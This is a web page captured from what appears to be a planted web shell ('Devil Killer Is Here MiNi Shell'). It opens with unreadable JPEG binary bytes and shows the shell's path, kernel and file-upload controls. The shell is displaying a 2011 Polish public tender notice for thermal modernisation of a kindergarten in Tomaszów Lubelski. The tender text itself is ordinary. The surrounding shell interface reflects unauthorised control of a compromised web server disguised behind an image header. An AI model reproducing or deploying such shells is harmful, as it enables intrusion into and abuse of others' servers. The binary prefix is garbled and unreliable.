JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111028/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20111028/356950-N-2011.html

<p class="kh_header"><b>Tomaszów Lubelski: Termomodernizacja budynków użyteczności publicznej Przedszkola Samorządowego Nr 1 przy ul. Chocimskiej w Tomaszowie Lubelskim.</b><br>
<b>Numer ogłoszenia: 356950 - 2011; data zamieszczenia: 28.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta w Tomaszowie Lubelskim , ul. Lwowska 57, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 084 6642125, faks 084 664 22 43.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tomaszow-lubelski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynków użyteczności publicznej Przedszkola Samorządowego Nr 1 przy ul. Chocimskiej w Tomaszowie Lubelskim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest wykonanie Termomodernizacji budynków użyteczności publicznej stanowiących mienie Samorządu Miasta Tomaszów Lubelski:
a)budynek Nr 1 Przedszkola Samorządowego Nr 1 przy ul. Chocimskiej 17 w Tomaszowie Lubelskim,
b)budynek Nr 2 Przedszkola Samorządowego Nr 1 przy ul. Chocimskiej 19 w Tomaszowie Lubelskim.
Przedmiot zamówienia obejmuje między innymi:
1.Budynek Nr 1 Przedszkola Samorządowego Nr 1 ul. Chocimska 17 w Tomaszowie Lubelskim.
a)Wymiana stolarki okiennej i drzwiowej.
-wymiana okien zespolonych na okna rozwierane i uchylno-rozwierane jednodzielne
z PCV o pow. ponad 1,5 m2 - 0,86x1,95m białe, z nawiewnikiem higrosterowanym -127,45 m2
-montaż prefabrykowanych parapetów zewnętrznych z blachy powlekanej, obróbki przy szerokości w rozwinięciu ponad 25 cm, blacha grubości 0,55 mm -33,94m2
b)Roboty dociepleniowe ścian nadziemia.
-docieplenie ścian z betonu płytami styropianowymi EPS - 100 gr. 14cm- przy użyciu got. zapraw klejących wraz z przyg. podłoża i ręczne wyk. wyprawy elew. z got. suchej mieszanki- na cokole, zaprawa tynkarska żywiczna (marmolit) -52,59m2
-docieplenie ścian budynków płytami styropianowymi- system przy użyciu gotowych
zapraw klejących wraz z przyg. podłoża ręczne wykonanie wyprawy elew. z got. 
suchej mieszanki - zamocowanie listwy startowej -138,21m
-docieplenie ścian z gazobetonu płytami styropianowymi EPS - 100 gr. 14 cm przy użyciu got. zapraw klejących wraz z przyg. podłoża i ręczne wyk. wyprawy elew. z got. suchej mieszanki -685,11m2 
-docieplenie ścian budynków płytami styropianowymi przy użyciu got. zapraw klejących wraz z przyg. podłoża i ręczne wyk. wyprawy elew. z got. suchej mieszanki - ochrona narożników wypukłych kątownikiem metalowym -667,00m
c)Docieplenie Stropodachów. 
-docieplenie stropodachu metodą wdmuchiwania pneumatycznego z zastosowaniem
granulatu wełny mineralnej grubości 14 cm -543,40m2
-pokrycie dachów papą termozgrzewalną jednowarstwowe - papa wierzchniego
krycia gr. min. 5mm -127,95m2
d)Ocieplenie stropu.
-izolacje cieplne i przeciwdźwiękowe z wełny mineralnej poziome z płyt układanych
na sucho - jedna warstwa -17,50m2
e)Montaż Konstrukcji nośnych.
- montaż konstrukcji nośnej K1  -0,38t
-montaż konstrukcji nośnej K2 -0,33t
f)Adaptacja pomieszczenia na wymiennikownię.
-posadzki jednobarwne z płytek kamionkowych GRES o wym. 30x30 cm na zaprawie
klejowej o grub. warstwy 5mm w pomieszczeniach o pow. do 10 m2 -3,06m2
g)Schody i chodniki od strony wschodniej. 
- rozebranie chodników, wysepek, przystankowych i przejść dla pieszych z płyt betonowych 35x35x5 cm na podsypce piaskowej -55,46m2
 -nawierzchnie z kostki brukowej betonowej Nostalit grub. 6 cm na podsypce 
cementowo-piaskowej -71,75m2
h)Schody przy kotłowni.
-rozebranie nawierzchni schodów z kostki brukowej na podsypce cementowo-piaskowej do odzysku -5,778m2
-nawierzchnie z kostki brukowej betonowej Nostalit grub. 6 cm na podsypce 
cementowo-piaskowej -5,76m2
i)Remont opaski odwadniającej.	
- rozebranie chodników, wysepek przystankowych i przejść dla pieszych z płyt betonowych 50x50x7 na podsypce cementowo-piaskowej	-14,80m2
- ręczne wykonanie koryta na całej szerokości jezdni i chodników w gruncie kat.
III-IV głębokość 20 cm. -77.80m2
-izolacje pionowe murów - dodatek za ułożenie następnej warstwy papy asfaltowej -18,78m2
-nawierzchnie z kostki brukowej betonowej Nostalit grub. 6 cm na podsypce 
cementowo-piaskowej - kolorowej -72,18m2
j)Wewnętrzna Instalacja C.O
- rurociągi SANNA - Therm ze stali węglowej 1,0034 łączona złączkami zaciskowymi
SANNA - Therm Press średnica 15x1,2 mm na ścianach bud. niemieszkalnych - 564,80m
-rurociągi SANNA - Therm ze stali węglowej 1,0034 łączona złączkami zaciskowymi
SANNA - Therm Press średnica 18x1,2 mm na ścianach bud. niemieszkalnych -107,90m
-zawór termostatyczny prosty z nastawą o śr. nom. do 15 mm -124,0szt.
-regulator różnicy ciśnienia z mosiądzu, z gwintem wewnętrznym, HYCOCON DP1 OVENTROP -33,0szt.
k)Grzejniki stalowe.
-grzejniki stalowe jednopłytowe o wysokości 300-500 mm i długości do 1600 mm KERMI typu THERM X2 PROFIL-K - 42,0szt.
-grzejniki stalowe jednopłytowe o wysokości 600-900 mm i długości do 1600 mm KERMI typu THERM X2 PROFIL-K - 13,0szt.
-grzejniki stalowe trzypłytowe o wysokości 300-500 mm i długości do 1600 mm KERMI typu THERM X2 PROFIL-K - 49,0szt.
l)Demontaż instalacji c.o 
- demontaż rurociągu stalowego o połączeniach spawanych o śr. 15 mm - 360,0m
- demontaż grzejnika żeliwnego członowego pow. ogrzew. do 2,5 m2 -105,0 kpl.
ł)Kolektory słoneczne do produkcji ciepła.
- kolektor słoneczny płaski c0=0,802; a1=3,8 W (m2K), a2=0,0067 W (m2K),
pow. eta. plus firmy BlueTec, F=1, 82m2  wraz z wyposażeniem:
-Zespół przyłączeniowy kolektorów ZPKS 5- 2 kpl.
-Konstrukcja uniwersalna KSAL-2 - 4 kpl.
-Konstrukcja uniwersalna KSAL-1 - 2 kpl.
-Profil maskujący KS - 8 kpl.
-Przyłącze elastyczne KS 3- 2 kpl. - 10,0szt.
- zasobnik ciepła dwuwężownicowy, parametry zasilania max 110st. C i 10 bar, maks. parametry c.w.u. 95 st. Ci 10 bar, pojemność V=1000 dm3 - 1,0 szt.
- pompa obiegowa dla c.w.u wygrzewu antylegionellowego G= 1,07 m3-h, H-1,1 mH2O np. Wilo-Star-Z20-4 CircoStar Rp 1 G1 ?, P1=0,0511, n=2100obr-min - 1,0 kpl.
m)Instalacja zasilania i sterowania solarów.
-przewody kabelkowe o łącznym przekroju żył do 7,5 mm2 układane w gotowych korytkach i na drabinkach bez umocowania -12,0m
- montaż osprzętu modułowego w rozdzielnicach T-K ogranicznik przepięć ETITEC-C
275/15 -4,0szt.
-montaż osprzętu modułowego w rozdzielnicach T-K wyłączników przeciwporażeniowych -1,0szt.
- podłączenie pompy Pzps w obudowie normalnej - kable 3-żyłowe Cu do 6 mm2 -1,0szt.
- montaż na gotowym podłożu opraw świetlówkowych CO1 236 ES-SYSTEM  tworzyw sztucznych z odbłyśnikiem - przykręcane końcowo - 2x40W -2,0kpl.
n)Wymiana zwodów poziomych i przewodów odprowadzających instalacji odgromowej. 
- demontaż przewodów wyrównawczych i odgromowych z płaskownikami lub pręta
mocowanych na dachu płaskim -235,0m
- montaż zwodów poziomych inst. odgromowej nienaprężanych z pręta o śr. do 10mm na dachu płaskim pokrytym papą na betonie -248,0m
2.Budynek Nr 2 Przedszkola Samorządowego Nr 1 ul. Chocimska 19 w Tomaszowie Lubelskim.
a)Rozbiórka komina.
- rozebranie ręczne kominów wolnostojących przy użyciu klinów i młotów -23,61 m3
- wywiezienie gruzu spryzmowanego samochodami samowyładowczymi na odl. do 1 km -29,95 m3 
b)Remont tarasu.
- rozebranie nawierzchni z kostki brukowej na podsypce cementowo-piaskowej do odzysku - 18,14 m2
-wywiezienie gruzu spryzmowanego samochodami samowyładowczymi na odl. do 1 km - 8,51 m3
- nawierzchnie z kostki brukowej betonowej NOSTALIT grub. 6 cm na podsypce 
cementowo - piaskowej - kolorowa - 19,30 m2
c)Wykonanie zejścia zachodniego. 
- rozebranie ław, stropów i fundamentów pod maszyny betonowych o grub. (wys.) do 70 cm	- 0,93 m3
- podkłady betonowe na podł. gruntowanym - gr. 10 cm, beton min. B - 10 - 3,55 m3
- konstrukcja ścianki i daszku jednospadowego z malowaniem - 14,75 m2
- pokrycie dachów o pow. do 25m2 o nachyleniu połaci do 85% blachą powlekaną trapezową  na łatach stalowych, blacha T35- dach i ściana - 13,04 m2
d)Wymiana pokrycia dachowego nad wejściem głównym.
- ołacenie połaci dachowych dla pokryć z blach powlekanych kontrłaty 25x50 mm - 8,89 m2
- ołacenie połaci dachowych dla pokryć z blach powlekanych łaty 50x50mm - 8,89 m2
- łacenie połaci dachowych dla pokryć z blach powlekanych przybicie deski czołowej 	- 3,14 m
- pokrycie dachów o pow. do 25 m2 o nachyleniu połaci do 85% blachą powlekaną
trapezowa na łatach - 8,89 m2
e)Wymiana stolarki okiennej i drzwiowej.
- wykucie z muru podokienników betonowych z lastryko - 110,65 m
- wymiana okien zespolonych na okna rozwierane i uchylno-rozwierane jednodzielne
z PCV o pow. ponad 1,5 m2-1,03x2,15m, białe, z nawiewnikiem higrosterowanym - 95,22 m2
- wymiana okien zespolonych na okna rozwierane i uchylno-rozwierane jednodzielne
z PVC o pow. ponad 1,5m2-1,03x1,65m, białe, z nawiewnikiem higrosterowanym  - 66,28 m2
- montaż prefabrykowanych parapetów zewnętrznych z blachy powlekanej, obróbki przy szerokości w rozwinięciu ponad 25 cm, blacha grubości 0,55 mm - 36,19 m2
- obsadzenie podokienników z konglomeratu marmurkowego gr. 3 cm, szerokość 35 cm, białe - 82,0 szt.
f)Roboty dociepleniowe ścian podziemia i opaska odwadniająca.
-impregnacja ścian piwnicznych beton. środkami odsalająco-odgrzybiającymi metodą smarowania, 2-krotne Esco-fluat - 135,78 m2
- dwuwarstwowe izolacje pionowe murów otynkowanych lepikiem- izolacja emulsją
niereagującą ze styropianem np. Emulbit Eko Styrklej - 135,78 m2
- ocieplenia ścian fundamentowych budynków płytami styropianowymi EPS - 100
grub. 15cm, przyklejenie płyt styropianowymi do ścian - 135,78 m2
- izolacje cieplne i przeciwdźwiękowe z płyt styropianowych pionowe na zaprawie
-zabezpieczenie dociskowe izolacji ze styropianu EPS-100 grub.20mm - 135,78 m2
-nawierzchnie opaski odwadniającej z kostki brukowej betonowej grubość 6 cm, 
na podsypce cementowo-piaskowej, kostka kolorowa - 122,82 m2
g)Roboty dociepleniowe ścian nadziemia.
- ocieplenie ścian budynków płytami styropianowymi - system STOPTER- przyklejenie drugiej warstwy siatki na ścianach cokołu - 120,87 m2
-przygotowanie starego podłoża pod docieplenie metodą lekko-mokrą- oczyszczenie
mechaniczne i zmycie ścian pod cokołem - 575,03 m2
-dociepl. ścian z gazobetonu płytami styrop. EPS-100 gr.15 cm przy użyciu got. Zapraw klejących wraz z przyg. podłoża i ręcznie wyk. wyprawy elew. z got. suchej mieszanki - 575,03 m2
- docieplenie ścian budynków płytami styropianowymi przy użyciu got. zapraw klejących wraz z przyg. podłoża i ręcznie wyk. wyprawy elew. z got. suchej mieszanki - ochrona narożników wypukłych kątownikiem metalowym - 642,05 m
- rynny dachowe półokrągłe o śr. 15 cm - z blachy stalowej ocynkowanej powlek. 0,6 mm - 116,80 m
h)Docieplenie stropodachów.
- docieplenie stropodachu metodą wdmuchiwania pneumatycznego z zastosowaniem granulatu wełny mineralnej grubości 14 cm - 512,10 m2
i)Montaż konstrukcji nośnej K1.
- wykonanie i dostawa konstrukcji nośnej K1, - 0,69 t
- naprawa pokryć dachowych papą termozgrzewalną - jednokrotnie pokrycie papą
wierzchniego krycia - powierzchnia wykonanych robót do 10 m2 - 8,0 m2
j)Adaptacja pomieszczeń na wymiennikownię. 
- odbicie tynków wewnętrznych z zaprawy cementowo-wapiennej na ścianach, filarach, pilastrach o powierzchni odbicia do 5 m2 - 3,49 m2
- uzupełnienie tynków zwykłych wewnętrznych kat. III z zaprawy cementowo-wapiennej na ścianach i słupach prostokątnych na podłożu z cegły i pustaków - 4,52 m2
- dwukrotne malowanie farbami emulsyjnymi starych tynków wewnętrznych ścian-akrylowa	   - 25,86 m2
k)Wewnętrzna instalacja c.o
- rurociągi SANHA-Therm ze stali węglowej 1,0034 łączona złączkami zaciskowymi 
SANHA-Therm Press średnica 15x1,2 mm na ścianach bud. nie mieszkalnych  - 327,70 m
- rurociągi SANHA-Therm ze stali węglowej 1,0034 łączona złączkami zaciskowymi
SANHA-Therm Press średnica 18x1,2 mm na ścianach bud. nie mieszkalnych - 75,40 m
l)Grzejniki stalowe.
- grzejniki stalowe jednopłytowe o wysokości 600-900 mm i długości do 1600 mm KERMI typu THERM X2 PROFIL-K - 46,0 szt.
- grzejniki stalowe dwupłytowe o wysokości 300-500 mm i długości do 3000 mm  - 11,0 szt.
- grzejniki stalowe dwupłytowe o wysokości 600-900 mm i długości do 1600 mm 
KERMI typu THERM X2 PROFIL-K - 18,0 szt.
ł)Roboty izolacyjne - izolacja cieplna rurociągów i urządzeń kotłowych. 
- izolacja rurociągów śr. 18 mm otulinami FLEXOROCK - jednowarstwowymi gr. 40 mm - 90,480 m
m)Przekucie przez przegrody budowlane.
- przebicie otworów w stropie ceramicznym - 52,0 szt.
- wywiezienie gruzu spryzmowanego samochodami skrzyniowymi - za każdy nast. 1 km  - dodatkowe 3 km - 15,0 m3
n)Demontaż instalacji c.o.
- demontaż rurociągu stalowego o połączeniach spawanych o śr. 15 mm - 460,0 m
- demontaż rurociągu stalowego o połączeniach spawanych o śr. 32 mm - 120,0 m 
- demontaż grzejnika żeliwnego członowego o pow. ogrzewania do 2,5 m2 -100,0 kpl
o)Kolektory słoneczne do produkcji ciepła.
- kolektor słoneczny płaski c0 = 0,802; a1=3,8W(m2K) a=0,0067 W/(m2K), pow. eta plus firmy BlueTec, F=1,82 m2 wraz z wyposażeniem.	 - 10,0szt.
- zbiornik schładzający V20, 10 bar, max=120st.C - 1,0szt.
- zespół pompowo - sterowniczy, - 1,0kpl. 
- rurociągi c.o miedziane lutowane o śr. zew. 22 mm (grub. ścianki 1,0 mm) na ścianach (lutowania miękkie) - 65,0m
- rurociągi w instalacjach wodociągowych wodociągowych o śr. nom. 15 mm stalowe ocynkow. o połącz. gwintów, na ścianach w budynkach nie mieszkalnych - 113,80m
p)Instalacja zasilania i sterowania solarów.
-montaż osprzętu modułowego w rozdzielnicach T-K ogranicznik przepięć ETITEC-C 275/15 - 4,0 szt.
-przewody kablowe OWYżo 2x1 mm2 układanie w gotowych korytkach i na drabinkach bez mocowania - 55,0 m
i inne roboty oznaczone w projekcie budowlano - wykonawczym, Specyfikacji technicznej wykonania i odbioru robót budowlanych i przedmiarach.
3.Zamawiający wymaga, aby oferta obejmowała całość przedmiotu zamówienia. Dokładnie i szczegółowo zakres robót niezbędnych do wykonania został opisany w
dokumentacji projektowej, w specyfikacji technicznej wykonania i odbioru robót budowlanych oraz w przedmiarach robót, które stanowią załączniki nr 8, 9 i 10 do SIWZ. Zaleca się, aby wykonawcy dokonali wizji lokalnej na terenie realizacji zadania i w jego okolicy w celu dokonania oceny dokumentów i informacji
przekazywanych w ramach przedmiotowego postępowania przez Zamawiającego. 3.1. Roboty budowlane realizowane będą na czynnym obiekcie w związku z czym muszą być wykonywane w sposób jak najmniej uciążliwy dla Przedszkola. 3.2.Wszelkie niezbędne materiały zabezpiecza wykonawca. Materiały winny
odpowiadać co do jakości wymaganiom określonym ustawą z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. Nr 92, poz. 881 z późn. zmianami) oraz wymaganiom określonym w szczegółowych specyfikacjach technicznych. 3.3.Roboty należy wykonać zgodnie z dokumentacją projektową, zgłoszeniem robót nie wymagających pozwolenia na budowę, oraz zachowaniem warunków wynikających z norm technicznych, specyfikacji technicznych wykonania i odbioru robot budowlanych oraz z wymogami sztuki budowlanej.
3.4.Wywóz i składowanie gruzu, odpadów zabezpiecza Wykonawca we własnym zakresie, na własny koszt przy przestrzeganiu przepisów ustawy z dnia 27 kwietnia 20011r. o odpadach (tekst jedn. Dz. U. z 2010 r. Nr 185 ,poz.1243 ). Pozostały materiał budowlany zakwalifikowany jako materiał nadający się do dalszego użytku,
należy składować w miejscu wskazanym przez zamawiającego z ułożeniem ręcznym w stosy (pryzmowanie) i przekazać zamawiającemu. 3.5.Wykonawca zobowiązany będzie również do: a)odpowiedniego ogrodzenia, oznakowania i urządzenia terenu budowy, w tym zaplecza budowy dla potrzeb własnych; b)zabezpieczenia
terenu budowy i prowadzonych robót budowlanych zgodnie z wymogami obowiązujących przepisów dotyczących bezpieczeństwa i higieny pracy oraz przeprowadzania w trakcie realizacji zamówienia wszelkich czynności
związanych z bezpieczeństwem na terenie budowy; c)naprawy na własny koszt wszystkich elementów pasa drogowego, które ulegną uszkodzeniu w czasie prowadzenia robót; d)ponoszenia w okresie realizacji inwestycji kosztów eksploatacyjnych związanych z realizowanym przedmiotem zamówienia; e)przekazania zamawiającemu w myśl przepisów ustawy Prawo budowlane dokumentacji budowy wraz z naniesionymi zmianami dokonanymi w
toku wykonywania robót, a także inne dokumenty jakościowe, w szczególności: - projekt budowlany i wykonawczy we wszystkich branżach z naniesionymi zmianami dokonanymi na rysunkach i w opisach, - inwentaryzację geodezyjną powykonawczą, - dziennik budowy; - instrukcje techniczne, atesty, aprobaty
techniczne, deklaracje zgodności; - karty gwarancyjne zabudowanych urządzeń ; - protokoły z prób, sprawdzeń i pomiarów, - protokoły odbiorów technicznych. Wszystkie dokumenty muszą być sporządzone w języku polskim
lub posiadać odpowiednie tłumaczenia, f)dokonania szkolenia pracowników Zamawiającego w zakresie obsługi zainstalowanych systemów i urządzeń; g)przeprowadzenia rozruchu urządzeń i systemów zainstalowanych w ramach realizacji przedmiotu zamówienia; h)komisyjnego przekazania przedmiotu umowy przy udziale zainteresowanych stron i organów, a także pokrycia kosztów z tym związanych; i)uczestniczenia w przeglądach gwarancyjnych w okresie gwarancji i rękojmi oraz w przeglądzie pogwarancyjnym; j)wykonania wszystkich
czynności, także nie przewidzianych wprost w umowie, związanych z pełnieniem funkcji wykonawcy w celu prawidłowego wykonania przedmiotu zamówienia;..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.00.00-2, 45.44.30.00-9, 45.45.00.00-6, 45.42.10.00-4, 45.33.24.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zainteresowany postępowaniem o udzielenie zamówienia publicznego wniesie wadium w wysokości  30 000,00 zł (słownie: trzydzieści tysięcy złotych).
1.Wadium można wnieść w formie:
a)pieniądza na konto zamawiającego,
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)gwarancjach bankowych,
d)gwarancjach ubezpieczeniowych,
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 (b) ust. 5, pkt. 2 ustawy z dnia 9.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz.1158 z późn. zm).
2.Wadium wnoszone w pieniądzu należy wpłacić przelewem przed upływem terminu składania ofert na rachunek bankowy wskazany przez Zamawiającego.
3.Wadium w pieniądzu można wnieść w terminie złożenia ofert, tj. do 14.11.2011r. 
do godz. 1000 na konto Nr 82 2030 0045 1110 0000 0063 8150 w Banku Gospodarki Żywnościowej SA Oddział w Tomaszowie Lubelskim, dołączając ksero dowodu wpłaty wadium do oferty.
4.Dowód wniesienia wadium w formie innej niż w pieniądzu powinien być dołączony do oferty w postaci oryginału.
5.Zamawiający zwraca wadium wszystkim Wykonawcom zgodnie z art. 46 ustawy Pzp niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania,z wyjątkiem wykonawcy, którego oferta zostało wybrana jako najkorzystniejsza.
6.Zamawiający zatrzymuje wadium wraz z odsetkami zgodnie z art. 46, ust.4a oraz ust.5 ustawy Pzp, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna przedmiotowy warunek za spełniony w odniesieniu do wykonawców, którzy:
wykażą się wiedzą i doświadczeniem w wykonaniu (zakończeniu) w okresie ostatnich 5 lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 2 robót budowlanych polegające na termomodernizacji budynków użyteczności publicznej lub obiektach innego rodzaju, wykonując na tych obiektach roboty budowlane o zbliżonym charakterze i funkcji, których sposób realizacji i poziom skomplikowania jest taki sam jak w przypadku inwestycji objętej niniejszym zamówieniem, 
o powierzchni budynku minimum 1000 m2 (każdy), kubaturze 3000 m3 (każdy), i wartości co najmniej 700 000,00 zł brutto (każdy).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
